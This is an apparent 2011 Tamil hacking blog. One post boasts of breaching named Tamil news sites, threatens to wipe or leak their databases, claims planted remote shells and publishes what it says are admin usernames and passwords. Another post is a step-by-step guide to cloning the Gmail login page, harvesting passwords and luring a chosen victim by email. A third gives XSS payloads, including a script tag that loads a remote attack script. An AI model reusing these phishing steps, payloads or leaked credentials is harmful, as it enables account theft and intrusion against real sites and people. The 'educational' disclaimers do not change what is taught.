Welcome to TAMIL SECURITY

Tamil Hacking news and tutorial site.

We Are Tamil Security

No:1 Tamil Security News and tutorial site on the net.

Tamil Security

TamilHacking.blogspot.com

Got a question?

If you have any questions regarding our posts please feel free to contact spiderboil66

Please Subscribe

Please subscribe to get more news and articles.

Monday, 17 October 2011

தரங்கெட்ட தமிழ் தளங்கள். (இரண்டாம் இணைப்பு)

இன்று அவசரமாக இந்த பதிவை இடவேண்டிய கட்டாயம். இந்த பதிவு தாங்களும் ஊடக இணையம் ஒன்றினை வைத்து நடத்துகின்றோம் என்று கூறி தம்பட்டம் அடித்துக்கொண்டிருப்பவர்களுடைய முகத்திரையினை கிழித்தெறியும் முகமாக இப்பதிவினை இடுகின்றேன். இந்த பதிவினை வாசித்தறிந்த பிறகு ஆ என்று வாயை பிளந்திடுவார்கள். கள்ள நெஞ்சுக்காரர்கள். சரி. நாம் விடையத்திற்கு வருவோம். அண்மைக்காலமாக புலம்பெயர்ந்த தமிழர்கள் சிலரால் நடாத்தப்படும் இணையத்தளங்கள் பற்றியும் அவற்றினால் ஏற்பட்டுள்ள பாதிப்புக்கள் பற்றியும் பலர் பலவாறான பதிவுகளை இட்டிருந்தனர். அத்துடன் சேர்த்து தகவல் திருட்டு பற்றியும் அவர்கள் பேசியிருந்தார்கள். சாதாரணமாக நடக்கும் ஒரு சின்ன விடையத்தினை கூட வக்கிரமான தலையங்கங்களுடன்  போட்டு தங்கள் தளங்களுக்கு விருந்தினர்களை வரவளைத்துக்கொள்கின்றார்கள் இந்த இணையத்தள புண்ணியவான்கள். பக்கத்து வீட்டுக்கிழவி குசு விட்டதை கூட செய்தியாக்கிவிடுவார்கள் இந்த வக்கிரபுத்திக்காரர்கள். மற்ற ஒருவன் பதிவிட அதனை கொத்தி தங்களுடைய தளத்தினில் போட்டுவிட்டு அப்பாவி தமிழ் மக்களிடையே பணத்தினை சுருட்டி தங்கள் பைகளில் போட்டுக்கொள்கிறார்கள்.  பணம் விழுங்கும் இவ் இணையத்தள முதலைகளில் முதல் நம் அப்பாவி பதிவர்களின் பதிவுகள். ‘டேய்! சொந்தமா இருந்து எழுதிப்பாருங்கோ‘ அப்பொழுது தெரியும் ஒரு பதிவினை இடுவது எவ்வளவு கஸ்டம் என்று.

எங்கள் தமிழ் Security குழுவின் பார்வையில் பல சமூக சீர்கேடான மற்றும் பணம் பறிப்பதையே நோக்காக கொண்ட பல இணையங்கள் இருந்தாலும் அவற்றுள் நாம் கீழ்க்குறிப்பிட்டுள்ளவை என்றும் எங்கள் குழுவின் கண்காணிப்பில் இருக்கின்றன.


இங்கு குறிப்பிடப்பட்டிருக்கும் தளங்கள் சுயலாபத்தினை கருத்தில் கொண்டு தங்கள் தளங்களினை நடத்திவருகின்றார்கள். உண்மையாக சொல்லபோனால் மக்களை ஏமாற்றி வருகின்றார்கள். Javascripts மூலம் தங்கள் தளத்தினின் தற்போது அதிகப்படியான வாசகர்கள் இருக்கின்றார்கள் என்று காட்டி மக்களினை ஏமாற்றி தங்கள் தளங்களின் இடத்தினை தக்க வைத்துள்ளார்கள். இனியும் குட்ட குட்ட குனியும் கும்பல் நாங்கள் இல்லை. உங்களுக்கு ஆப்பு வைப்பதற்கான நேரம் வந்தாகி விட்டது என் செல்ல குட்டிகளே. இங்கு குறிப்பிடபட்டிருக்கும் (tamilcnn, jaffnawin, kusumbu,) போன்றவை குறித்த ஒருவரது அல்லது ஒரு நிறுவனத்தின் கட்டுப்பாட்டினுள் இருக்கின்றது. அதே போன்று லங்காசிறி இணையத்தள குழுமத்திற்கு Tamilwin, Lankasri போன்ற ஓர் பெரிய முகம் இருந்தாலும் பிற்புலத்தில் manithan.com போன்ற பரபரப்பு செய்திகளை வழங்கும் ஓர் சின்னபுள்ள இணையத்தினையும் வைத்து இயக்கிக்கொண்டிருக்கின்றார்கள். இந்த newjaffna.com இணையத்தளமானது http://pirasath.net/ pirasath@hotmail.fr (இம்மின்னஞ்சல் முகவரி சில மாதங்களுக்கு முன்னர் newjaffna.com இணையத்தளத்தினில் விளம்பரத்தொடர்புகளுக்கு வழங்கப்பட்டிருந்தது. ) என்ற இணையத்தளத்தின் உரிமம் உள்ளவர் பெயரில் பதியப்பட்டுள்ளது. இந்த newjaffna.com (yarlmann.com) இணையத்தினை வெளிநாடுகளில் இருக்கும் நபர் உதவியுடன் நடத்தினானும் இவ்விணையத்தளத்தினை வடிவமைத்துக்கொடுத்தது www.newyarl.com என்ற இணையத்தளத்தினை வடிவமைத்த http://www.epixcell.net/ நிறுவனத்தினரே வடிவமைத்திருக்கின்றார்கள் அதற்கான சான்று கீழே உள்ள படத்தினில் நீங்கள் காணலாம்.



 இது இவ்வாறு இருக்க, இந்த இணையத்தளங்கள் உண்மையாகவே தமிழர் மீதும் தமிழ் கலாசாரம் மீதும் பற்றுள்ளவர்களாக இருப்பின் ஏன் அவர்களுடைய விபரங்களை மறைத்துக்கொண்டு செய்திகளினை வெளியிட வேண்டும்? உதாரணமாக,

இந்த படத்தில் காட்டப்பட்டிருப்பது newjaffna.com தளத்திற்கான who is தேடலின் பதிலாகும். இத்தேடலில் இத்தளத்தினை யார்பெயரில் பதிந்திருக்கின்றார்கள் அத்துடன் யார் இத்தளத்தின் நிர்வாகி மற்றும் தளத்தின் தொடர்பு இலக்கங்கள் என்பன காண்பிக்கப்படும். இவர்கள் இதன் மூலமாக தங்கள் அடையாளங்களினை மறைத்துக்கொண்டு செய்திகளை வெளியிடுகிறார்கள். உண்மையை சொல்ல போனால் கொப்பி அடிச்சு போடுகின்றார்கள். Newjaffna.com இணையத்தளத்தினுடைய முழு Database எங்கள் கையில் உள்ளது. அவர்களது Current_db: Jaffnasi@localhost இந்த தகவல் மட்டும் அவர்களுக்கு போதும் என்று நினைக்கின்றேன். இல்லாது போயின் கீழ்க்காணும் இந்த சுட்டிகளினை பரசோதித்து பாருங்கள். என்ன திரவியங்கள் காணப்படுகின்றன என்று.

சரி. இங்கு வழங்கப்பட்டிருக்கும் serverல் இருக்கும் படங்கள் மற்றும் காணொளிகள்  உங்கள் பார்வைக்கு நேரடியாக. சரி. இவர்களை என்ன செய்யலாம்? இவர்களது முழு database தகவல்களையும் வெளியிடலாமா? அல்லது இவர்களுடைய இணையத்தினை பேசாமல் துாங்க போட்டு விடலாமா? நீங்களே உங்கள் கருத்துக்களை கூறுங்கள்.

இனி நாம் பார்க்கவிருப்பது www.tamilcnn.com தளத்தினை பற்றி. இத்தளத்தினுள்ளும் நாம் சென்று வந்திருக்கின்றோம். உங்களுக்காக அதற்கான சில ஆதாரங்களினை வெளியிட வேண்டிய கட்டாயத்தில் நாம் இருக்கின்றோம். இத்தளத்தினையும் நாம் முற்றுமுழுதாக கண்காணித்த வண்ணம் இருக்கின்றோம். எந்நேரத்திலும் இத்தளத்தினுடைய Full database அழித்து இந்த தளம் இருந்த தடையமே இல்லாமல் பண்ணிவிட முடியும். செய்ய வேண்டுமா? வேண்டாமா? ஒரு சந்தர்ப்பம் வழங்கித்தான் பார்க்கலாமே? என்ன சந்தர்ப்பம் ஒன்று நாம் வழங்கலாமா இந்த புண்ணியவான்களுக்கு?




இது இவர்களுடைய தளத்தின் database மற்றும் tables. இதைவிட இன்னும் கொஞ்சம் நாம் சுவாரஸ்ஸமான விடையம் ஒன்றினை பார்க்கலாம். இத்தளத்தினுடைய administrator புகுபதிகை தகவல்களினை நாம் வழங்கினால் எப்படி இருக்கும்? திருடனுக்கு தேள் கொட்டியது போன்று என்று கேள்விப்பட்டிருப்பீர்கள் ஆனால் அதை நேரில் பார்ப்பது என்றால் இப்பொழுது பார்க்கலாம்.

    username     password
     jaffna09$$     09$$win$
     co$$win$     coa9$$**
    poster8     green$$*@
    poster123     white#@()%

இதுதான் அவர்களுடைய புகுபதிகை தகவல்கள். இந்த பதிவினை வாசித்த பின்னர் அவர்கள் தங்கள் தரவுகளை மாற்றியிருக்கலாம். மாற்றினால் மாற்ற மாற்ற நாம் அவற்றினை எடுத்து வெளியிட்டுக்கொண்டே இருப்போம். இதேபோன்று எங்களிடம் இவர்களுடைய www.kusumbu.com,  www.jaffnawin.com  போன்ற தளங்களினுடைய புகுபதிகை தகவல்கள் மற்றும் Complete database கைவசம் இருக்கின்றது. அடுத்த ரிலீஸ்ல அவை அனைத்தும் வெளியிட நாம் தயாராக இருக்கின்றோம்.

http://www.tamilcnn.com/images/

இங்கு வழங்கப்பட்டிருக்கும் சுட்டிகளில் சென்று பாருங்கள். புதையல்களை கிண்டலாம். இவர்களுடைய போலி முகத்தினை கிழித்தெறியலாம். இன்னமும் எங்களிடம் ஏகப்பட்ட தரவுகள் இருக்கின்றன. sensitive informations எம் கைவசம் இருக்கின்றன. இந்த இரண்டு இணையத்தளங்கள் மட்டுமல்ல. லங்காசிறி இணையத்தளம் பற்றிய தகவல்களும் தான். நாம் ஆதாரங்களுடன் அடுத்த பதிவில் அவற்றினை வெளியிடுவோம்.


 
இந்த பாட்டு தற்போதைய நிலைக்கு பொருத்தமாக இருக்கும் என்று நினைக்கின்றேன்.


இரண்டாம் இணைப்பு: தமிழ் சி.என்.என் இணையம் தங்கள் தளத்தின் ஓட்டைகளை பொத்த ஆரம்பித்திருக்கின்றார்கள். பொத்தி என்ன பயன்? அவர்களது சர்வரில் பதியப்பட்டிருக்கும் எங்கள் Remote shell code's ஜ கண்டுபிடித்து அழிப்பதற்குள் வயாதாகி விடும். சரி. என்ன என்ன மாற்றங்களினை செய்திருக்கின்றார்கள்? ஆம். சும்மா அவிட்டு போட்டு கிடந்த Directory listing எல்லாவற்றினையும் இப்பொழுது தான் பாஸ்வேட் குடுத்து பாதுகாக்கின்றார்கள். நீங்கள் Tamilcnn.com இணையத்திற்கு விஜயம் செய்வீர்களே ஆனால் இந்த மாற்றங்களை காணலாம். இத்தோடு மட்டும் நின்றுவிடவில்லை Root directory கூட கொஞ்ச நேரம் நிறுத்தி வைத்துவிட்டார்கள். என்ன கொடுமை இது. என்ன தான் வீரதீரங்கள் புரிந்தாலும் நீங்கள் பாதுகாப்பு பலப்படுத்திவிட்டு நின்மதி பெருமூச்சு விடுவதற்குள் இங்கு உங்கள் தளத்தின் Administration தகவல்களினை நாம் வெளியிட்டு விடுவோம்.மூற்றாம் இணைப்பும் வரும் என எதிர்பார்க்கின்றேன்.

நன்றி.

தமிழ் Security குழுமத்தின் சார்பில் Spiderboil66

Friday, 7 October 2011

மின்னஞ்சல் தகவல் திருட்டு (Email hacking)

நீண்ட இடைவெளியின் பின்னர் இன்றுதான் மீண்டும் ஒரு பதிவிடவேண்டும் என்ற நோக்கத்துடன் கணனி முன் அமர்ந்திருக்கின்றேன். பல வேலைப்பளுக்கள் இருந்தாலும் அட நம்மட வலைப்பதிவு வாசகர்கள் ரொம்ப எதிர்பார்ப்பார்களே என்று எண்ணி எண்ணி கடைசியாக இன்று பதிவெழுதுவது உறுதியாகிவிட்டது. சரி இன்று நாம் பார்க்கப்போவது "பிஸ்சிங்" என்று சொல்லப்படுகின்ற ஓர் தகவல் திருட்டு முறை பற்றியாகும். 

இந்த பிஸ்ஸிங் முறை பற்றி பலரும் அறிந்திருப்பீர்கள். அதாவது நான் ஒரு கொந்தர் என்று மார் தட்டும் அனைவரும் இந்த முறையை கற்றுத்தேர்ந்து தான் வந்திருப்பார்கள். ஆனால் கொந்தர்கள் உலகத்தில் மிக மிக சின்னபிள்ளை தனமான அல்ல மிகவும் ஆரம்பகட்டமாக தாக்குதல் முறையாகவே இம்முறைமை கொள்ளப்படுகின்றது. சரி நாங்கள் இம்முறைபற்றி சற்று விலாவரியாக பார்த்துவிடலாம். 


பிஸ்ஸிங் என்பது நாம் பிரவேசிக்கும் தளத்தினை போன்றே இருக்கும் ஓர் போலித்தளத்தினை உருவாக்கி அத்தளத்தினுாடக தகவல்திருட்டினில் ஈடுபடுவதாகும். உதாரணமாக நீங்கள் ஜிமெல் கணக்கு வைத்திருப்பவர் என்று வைத்துக்கொள்வோம். நீங்கள் உங்கள் மின்னஞ்சல் முகவரிக்கு விஜயம் செய்யும் போது அதே போன்று அச்சு அசல் காட்சியளிக்கும் ஓர் தளத்தினை தாக்குதல் தாரி உங்களுக்கு காண்பிப்பார். நீங்களும் அவசரத்தில் உங்கள் புகுபதிகை தரவுகளை அதிலே தந்து விடுவீர்கள். பிறகென்ன உங்கள் தகவல்கள் குறித்த கொந்தரின் கைகளுக்கு சென்றுவிடும். 

இது ஒரு நொடிப்பொழுதினிலே நடக்கும் தாக்குதலாகும். அதுவும் நீங்கள் கவனயீனமாக இருக்கும் சந்தர்ப்பங்களில் மாத்திரமே சாத்தியமாகின்றது இத்தாக்குதல். சரி நாம் தாக்குதல் என்றால் என்ன என்று பார்த்தாகி விட்டது. இனி நாங்கள் எவ்வாறு ஒருபோலி தளத்தினை உருவாக்குவது மற்றும் எவ்வாறு அத்தளத்தினை மற்றவருக்கு கொண்டு சென்று சேர்ப்பது என்பதையும் அத்துடன் உங்களுக்கு யாராவது இம்முறைமூலம் தாக்குதல் நடத்த முயன்றால் எவ்வாறு உங்களை பாதுகாத்துக்கொள்வது என்றும் நாம் பார்க்கலாம்.


போலி தளம் தயாரித்தல்

சரி. முதலில் நீங்கள் என்னமாதிரியான போலித்தளத்தினை தயாரிக்க போகின்றீர்கள் என்று முடிவு செய்துகொள்ளுங்கள். நான் உங்களுக்காக ஜிமெல் போன்றே காட்சியளிக்கின்ற ஓர் போலித்தளத்தினை உருவாக்கி அதனை எவ்வாறு நாம் தாக்க நினைப்பவருக்கு அனுப்பவதும் என்று காட்டப்போகின்றேன்.

1. முதலில் உண்மையான ஜிமெயில் தளத்திற்கு செல்லுங்கள். அங்கு உங்கள் உலவியில் "Right click" செய்து "View page source" என்பதினை தெரிவு செய்து கொள்ளுங்கள். 

2. இப்பொழுது நீங்கள் ஜிமெயிலின் source code பார்க்க கூடியதாக இருக்கும். இப்பொழுது நீங்கள் Ctrl + A ஒரே சமயத்தில் அமுக்கு அனைத்து கோடிங்குகளையும் தெரிவு செய்து கொள்ளுங்கள்.





3. இப்பொழுது நீங்கள் உங்கள் கணனியில் Note pad ஜ திறந்து கொள்ளுங்கள். அதிலே நீங்கள் தெரிவு செய்து வைத்திருப்பதை Ctrl + V சொடுக்கி  போஸ்ட் செய்து கொள்ளுங்கள். 



4. இப்பொழுது முழு கோடிங்கும் நீங்கள் பார்க்க கூடியதாக இருக்கும். இனி நீங்கள் படத்தில் காட்டியவாறு "Tools---> find and replace" தெரிவு செய்துவிட்டு "Action" என்ற சொல்லினை தேடி அதனை "input.php" என்று பெயர் மாற்றம் செய்து கொள்ளுங்கள். 





5. இப்பொழுது நாம் மாற்றம் செய்த கோப்பினை index.html என்ற பெயரில் ஓர் கோப்பினில் சேமித்துக்கொள்ள வேண்டும். 


நீங்கள் கேக்கலாம் அது ஏன் action என்ற தொடுப்பு இருந்த இடத்திலே நாம் ஏன் input.php என்று மாற்றம் செய்தோம் என்று. அதாவது நீங்கள் குறிவைத்திருப்பவர் தனது தரவுகளை நீங்கள் அனுப்பும் இந்த பக்கத்தில் வழங்கி விட்டு login ஜ சொடுக்கும் போது உங்கள் சர்வரில் அவரது தரவுகளை பதித்து விட்டு அவரை நாம் உண்மையான ஜிமெயிலின் தளத்திற்கு கைகாட்டி விட்டு விடுவோம். என்ன நடக்கின்றது தெரியாமல் குழம்பிப்போய் நிப்பாரு நம்மாளு. சரி அந்த input.php என்ற கோப்பினை எவ்வாறு உருவாக்குவாது என்பதினை பார்த்துவிடலாம். இங்கே கீழே காணப்படுகின்ற இந்த கோடிங்கினை கொப்பி செய்து ஒரு Note pad ல் ஒட்டி விடுங்கள். அந்த கோப்பினை input.php என்ற பெயரினில் ஏற்கனவே index.html கோப்பு இருக்கும் இடத்தில் சேமித்துவிடுங்கள்.  





உங்கள் வேலை இன்னமும் முடியவில்லை. நீங்கள் சேமித்து வைத்திருக்கும் இடத்தினில் password.txt எனும் பெயரில் ஓர்  சாதாரண text file ஒன்றினை சேமித்துக்கொள்ளுங்கள். இப்பொழுது எங்கள் ஜிமெயிலின் போலிப்பக்கத்தினை சர்வர் ஒன்றினை உருவாக்கி எவ்வாறு சேமிப்பது என்று பார்த்து விடலாம். 


கோப்புக்களினை பதிவேற்றம் செய்தல்.

இணையத்திலே பல நிறுவனங்கள் இலவசமாக Web hosting வசதிகளை வழங்குகின்றன. அனேக தளங்கள் இந்த மாதிரியான போலிப்பக்கங்கள் பதிவேற்றம் செய்யும் சந்தர்ப்பத்தில் அவற்றினை இனங்கண்டு அழித்துவிடுவதற்கென பல Scripts தன்னகத்தே கொண்டுள்ளன. ஆக நீங்கள் உங்கள் போலிப்பக்க்தினை பதிவேற்றம் செய்து அடுத்த நிமிடமே உங்கள் கணக்கு முடக்கப்படலாம். துவண்டுவிடாமல் பல தளங்களிலும் உங்கள் கோப்பினை பதிவேற்றம் செய்ய வேண்டும். அப்பொழுது தான் பத்தில் ஒன்றாவது வேலை செய்யும்.  சரி. இலவசமாக Web hosting வசதினை வழங்கும் நிறுவனங்கள் அனைத்தையும் தன்னகத்தே கொண்ட ஓர் தளம் தான் www.free-webhosts.com தளமாகும். இத்தளத்தினிலே இலவசமாக சேவையை வழங்கும் நிறுவனங்கள் பட்டியலிடப்பட்டிருக்கும். விளம்பரங்கள் இல்லாத தளமாய் ஒன்றினை தெரிவு செய்து அதிலே உங்களுக்கு ஓர் கணக்கினை உருவாக்கி கொள்ளுங்கள். www.byethost31.com தான் என்னுடைய பரிந்துரைப்பு. ஏன் என்று சொன்னால் இத்தளத்தில் போலிப்பக்கங்களை கண்டு பிடிப்பதற்கான Scripts இருந்தும் அவை சரிவர இயங்கவில்லை.


இனி நீங்கள் செய்யவேண்டியது எல்லாம் நீங்கள் இலக்குவைத்திருப்பவரை அவருடைய கணக்கு புகுபதிதை தகவல்களை இந்த போலித்தளத்திலே வழங்குவதற்கு ஒரு சந்தர்ப்பத்தினை உருவாக்க வேண்டும். தெளிவாக கூறப்போனால் அவரை ஏமாற்றி உங்கள் சதி வலையில் சிக்க வைக்க வேண்டும். அந்த பெரிய ஈபிள் கோபுரத்தினையே ஒருவர் தன்னுடையது என்று கூறி பல தடவைகள் விற்க முயற்சித்திருக்கின்றார். நீங்கள் சாதாரண இந்த இலக்கினை ஏமாற்ற முடியாதா? Best social engineering skill தான் தேவை என்கிற அவசியம் இல்லை. சும்மா சாதாரண கள்ள புத்தி இருந்தாலே போதும். எல்லாம் இலகுவாகி விடும். சரி. எனக்கு நீங்கள் திட்டுவது புரிகின்றது ஏன்டா இந்தளவும் அழகா சொல்லி தந்துவிட்டு ஏன் கடைசில சொதப்பல் என்று தானே திட்டுறீங்க. இதே அதையும் காட்டிடுறன்.

ஒரு புதிய மின்னஞ்சல் கணக்கு ஒன்றினை ஆரம்பித்துக்கொள்ளுங்கள். அப்பொழுது தான் நீங்கள் போலித்தளத்துடன் அனுப்பும் மின்னஞ்சல் Junk folderல் செல்லாமல் inbox ற்கு செல்லும். சரி. தற்காலத்தில் என்ன விடையம் பரபரப்பாக இருக்கின்றதோ அதனை சம்பந்தப்படுத்தி ஓர் அழகிய மி்ன்னஞ்சல் ஒன்றினை உருவாக்கிக்கொள்ளுங்கள். உங்கள் இலக்கு அதாவது நீங்கள் தாக்கவிருப்பவருக்கு என்ன விடையங்கள் பிடிக்கும் என்று அவருடைய முகப்புத்தகத்தில் சென்று பார்த்தீர்களேயானால் இலகுவாக கண்டறிந்துவிடலாம். மின்னஞ்சலினை தயாரித்துவிட்டு இறுதியினிலே படத்தினிலே காட்டப்பட்டிருப்பது போன்று உண்மையான ஒரு தொடர்பின் பின் உங்கள் போலித்தளத்தின் சுட்டியினை வழங்கி விடுங்கள். இலக்கு அந்த சுட்டியிலே சொடுக்கி சென்று பார்க்க கூடியவாறு உங்கள் மின்னஞ்சல் கவர்ச்சிகரமாக இருக்கவேண்டும் என்பதினை மறந்துவிடாதீர்கள். 


குறிப்பு : தகவல் திருட்டு பாரிய குற்றம் நண்பர்களே! இங்கு உங்களுக்கு தரப்பட்டிருக்கும் தகவல்கள் அனைத்தும் கல்வி நோக்கத்திற்காகவே. இங்கு வழங்கப்பட்டுள்ள தகவல்களினை கொண்டு நீங்கள் செய்யும் விளையாட்டுக்களுக்கு நானோ அல்ல இவ்வலைப்பதிவோ பொறுப்பல்ல. சிந்தித்து செயற்படுங்கள். 

வருகின்ற பதிவினில் பல பிரபல தளங்களில் நான் சென்று விளையாடிய சான்றுகளுடன் ஒரு இணையத்தளம் ஒன்றினை எவ்வாறு ஹக் செய்வது என்ற தகவலுடன் சந்திக்கின்றேன். 

 நன்றி.


Spiderboil66 

Tuesday, 8 March 2011

XSS attack [ எக்ஸ் எஸ் எஸ் தாக்குதல் ]

வணக்கம் நண்பர்களே, இன்று கிட்டத்தட்ட ஒரு வாரத்திற்கு பிறகு பதிவெழுதுவதற்கு கொஞ்சம் நேரம் கிடைத்திருக்கின்றது. இன்று நாங்கள் பார்க்கப்போவது XSS attack பற்றியாகும். இன்று எல்லோருக்கும் இணையத்தளம் ஒன்றினை வடிவமைக்கத்தெரியும். இதில் எத்தனை பேருக்கு தாங்கள் தயாரிக்கும் தளத்தினை எவ்வாறு சிறந்த முறையில் பாதுகாப்பது என்று தெரியும். அது கேள்விக்குறியே. சரி.  நாம் விடையத்திற்கு வருவோம். 

XSS ATTACK என்பது பெரும்பாலும் ஒழுங்காக பாதுகாக்கப்படாத தளங்களில் CLIENT SIDE SCRIPT மூலமாக தாக்குதல் நடத்தும் முறையாகும். இம்முறையானது பொதுவாக ஒரு பாதுகாப்பு குறைபாடு உள்ள தளத்திலே ஒரு சாதாரண பயனாளர் உள்நுழையும் போது அவருடன் இணைந்து தாக்குதல் தாரியும் உள்நுழைந்து இணையத்திலே மாற்றங்களை ஏற்படுத்துவது தான் XSS ATTACK என்று குறிப்பிடப்படுகின்றது. இதனை Cross site scripting என்றும் அழைப்பார்கள்.

பொதுவாக சாதாரண ஒரு HTTP REQUEST மூலமாகவே இத்தாக்குதலினை எளிதாக நடத்தி முடித்துவிடலாம். பெரும்பாலும் PHP பயன்படுத்தி இயங்குகின்ற தளங்களில் தான் இந்த மாதிரியான தாக்குதல்கள் அதிகம் இடம்பெறுகின்றன. உதாரணமாக சொல்லப்போனால் நீங்கள் சாதாரணமாக ஒரு கலந்துரையாடல் தளத்திலே இருக்கின்றீர்கள். அங்கு நல்ல கவர்சிகரமான ஒரு பதிவு இடப்பட்டு இருக்கின்றது. நீங்கள் அங்கு சொடுக்கும் பட்சத்தில் நீங்கள் அந்த பதிவினை காண்பீர்கள். ஆனால் அதே சமயத்தில் உங்கள் கணக்கு திருடு போய் இருக்கும். இந்த மாதிரியான திருட்டினைத்தான் நாம் XSS ATTACK என்று கூறிகின்றோம்.சரி மிக இலகுவாக எவ்வாறு ஒரு தாக்குதலினை தொடரலாம் என்பதை இங்கு பார்க்கலாம்.

தளத்தினை பரிசீலித்தல்

நீங்கள் தாக்கவிருக்கும் தளத்திளை தெரிவு செய்த பின்னர் அத்தளத்திலே தேடுவதற்கு Search box இருக்குமாயின் அப்பெட்டியினுள் கீழ் வரும் கோடிங்கை இட்டு தேடிப்பாருங்கள். அப்பொழுது உங்களுக்கு தெரியும் இத்தளம் தாக்குதலுக்கு இலகுவானதா இல்லையா என்று. 

<IMG SRC=JaVaScRiPt:alert('Site is vulnerable')>

இது போன்று நீங்கள் தேடும் பொழுது அடைப்புக்குறிக்குள் இருக்கும் தகவல் ஒரு POP UP window வில் தோன்றுமாயில் அத்தளம் தாக்குதலுக்கு இலகுவானது என்ற முடிவுக்கு வரலாம்.  அடுத்து நீங்கள் அத்தளத்தினிலே உங்கள் தளத்திலே நிறுவியிருக்கும் ஜாவா நிரலிக்கான தொடுப்பினை கீழ்க்கண்டவாறு கொடுத்து விட்டால் சரி. 

<SCRIPT SRC=http://yourwebsite.com/hackingscript.js></SCRIPT>

இவ்வாறு நீங்கள் ஏற்கனவே பதிவேற்றி வைத்திருக்கும் உங்கள் தளத்தின் ஜாவா நிரலியின் தொடுப்பினை கொடுத்து விட்டால் சரி. இதிலே சொடுக்கும் ஒவ்வொரு சந்தர்ப்பங்களிலும் உங்கள் ஜாவா நிரலி செயற்படும். சரி. இது தான் சாதாரண ஒரு செயன்முறை.

எவ்வாறு அத்தளத்திலே இருக்கும் உறுப்பினர்களை உங்கள் வலையில் சிக்கவைப்பது அதற்கு எவ்வாறு SOCIAL ENGINEERING செய்வது போன்ற விடையங்கள் எல்லாம் நான் சொல்லுவேன் என்று எதிர்பார்த்தால் நீங்கள் ஒரு கொந்தாரக ஆகவே முடியாது. { Don't learn to hack. hack to learn }. இது யார் சொன்னது என்ற ஆராய்ச்சி எல்லாம் நமக்கு தேவையில்லாத ஒன்று.

குறிப்பு: நண்பர்களே, நான் இங்கு வழங்கும் விடையங்கள்  மற்றும் நிரலிகள் அனைத்தும் கல்வி நோக்கத்திற்காகவே. தகவல் திருட்டு ஒரு பாரிய குற்றம். சிந்தித்து செயற்படுங்கள். 

Tuesday, 1 March 2011

HACKERS [கொந்தர்கள்]




இன்று முதல் பதிவே கொந்தர்கள் பற்றியது. சரி. நீங்கள் சிந்திப்பது எனக்கு விளங்குகின்றது. அது என்ன ‘கொந்தர்‘ என்று தானே ஜோசிக்கின்றீர்கள்? கொந்தர் என்பது ஆங்கில வார்த்தையான HACKER என்பதன் தமிழ் வடிவம். ஆம்! இன்று நாங்கள் அவர்களை பற்றி தான் பார்க்கப்போகின்றோம்.

தற்காலத்திலே கொந்தர்கள் பல வகையினர் இருந்தாலும் குறிப்பாக இனங்கண்டு வகைப்படுத்தப்பட்டிருப்பவர்கள் மூன்று பிரிவினரே. அவர்களில் WHITE HAT HACKER, GREY HAT HACKER, BLACK HAT HACKER. என மூன்று பிரிவுகளாக பிரிவுபடுத்திப்பார்க்கின்றது இந்த தொழிநுட்ப சமூகம். சரி. இந்த மூன்று குழுவினரையும் பற்றி சற்று விரிவாக பார்த்து விடலாம். 

WHITE HAT HACKERS

இந்த வகையினில் அடங்குபவர்கள் தான் தற்போது வெளியே வந்த மற்றும் வரவிருக்கின்ற கணனி வைரஸகள்  போன்ற வற்றோடு  போராடிக்கொண்டிருக்கின்றார்கள். ஆம். இவர்கள் சட்டரீதியாக கொந்தர் என ஏற்றுக்கொள்ளப்பட்டவர்கள். இவர்கள் பொதுவாக பெரிய பெரிய Antivirus software கம்பனிகளிலே வேலை பார்ப்பவர்கள். இவர்களில் அனேகர் தங்கள் அறிவை நல்ல விதத்தில் பயன்படுத்துபவர்கள். ஒ்வொரு சந்தேகத்திற்கிடமான கோப்புக்களையும் பரிசீலித்து அவற்றுள் புதைந்து கிடக்கும் வைரஸ்களை கண்டு பிடித்து அவற்றை எதிர்ப்பதற்கான Antivirus Database ல் தரவுகளை ஏற்றி எங்களின் பாவனைக்கு தருபவர்கள். நீங்களும் கணனியில் Hacking, Sniffing ல் ஆர்வம் உடையவர் என்றால் அதற்கான பாடநெறிகள் இருக்கின்றன. அவற்றினை கற்பதன் மூலம் நீங்களும் ஓர் கணனி பாதுகாப்பு வல்லுனர் ஆகலாம். மேலதிக தகவல்களுக்கு இந்த தளத்திற்கு செல்லுங்கள்.


GREY HAT HACKERS

இந்த Grey Hat Hackers பாதி நல்லவர்கள். பாதி கெட்டவர்கள். ஆம். உதாரணமாக சொல்லபோனால், காலையில் நல்ல பிள்ளை போன்று அலுவலகம் சென்று வந்து விட்டு பின்னர் இரவு நேரங்களில் அல்லது நேரம் கிடைக்கும் பொழுது வைரஸ்கள் உருவாக்குதல், தகவல் திருட்டு, REVERSE ENGINEERING, CRACKING, DECODING, போன்ற வேலைகளில் ஈடுபடுவார்கள். அத்துடன் இவர்கள் தாங்கள் வேலை பார்க்கும் இடத்தில் மிகவும் உண்மையாக உழைப்பவர்களாக இருப்பார்கள். இந்த வகையினில் சொல்லுமளவுக்கு அதிகமான கொந்தர்கள் இல்லை. 

BLACK HAT HACKERS  

இணையத்திலே ஏற்படுகின்ற பாதி பிரச்சனைகளுக்கு சூத்திரதாரிகள் இவர்கள் தான். சாதாரண மின்னஞ்சல் கடவுச்சொல் திருட்டு தொடக்கம் பெரிய பெரிய இணையத்தளங்களின் முறிவுக்கு காரணமாக இருப்பவர்கள் இவர்கள் தான். இவர்களால் தான் WHITE HAT HACKERS எந்த நாளும் வேலையாக இருக்கிறார்கள். அந்தளவுக்கு கெட்டிக்காரர்கள். இவர்கள் அனேகமாக WEB SITE HACKING & UPLOADING SHELLS, BACK DOORING SITES, BACK DOORING COMPUTERS, CRACKING SOFTWARES, CREATING SPYWARES, CREATING VIRUS'S, SPREADING VIRUS FILES, GAINING UNAUTHORIZED ACCESS TO THE SERVERS. இப்படியான வேலைகளில் ஈடுபடுபவர்கள். இவர்கள் அதி புத்திசாலிகள். ஆனால் அவற்றை நல்ல முறையில் பயன்படுத்தாமல் தீய வழிகளிலே பயன்படுத்தி பணம் பார்ப்பவர்கள். சிலர் இதனை ஒரு பொழுதுபோக்காகவும் செய்து வருகின்றார்கள். 


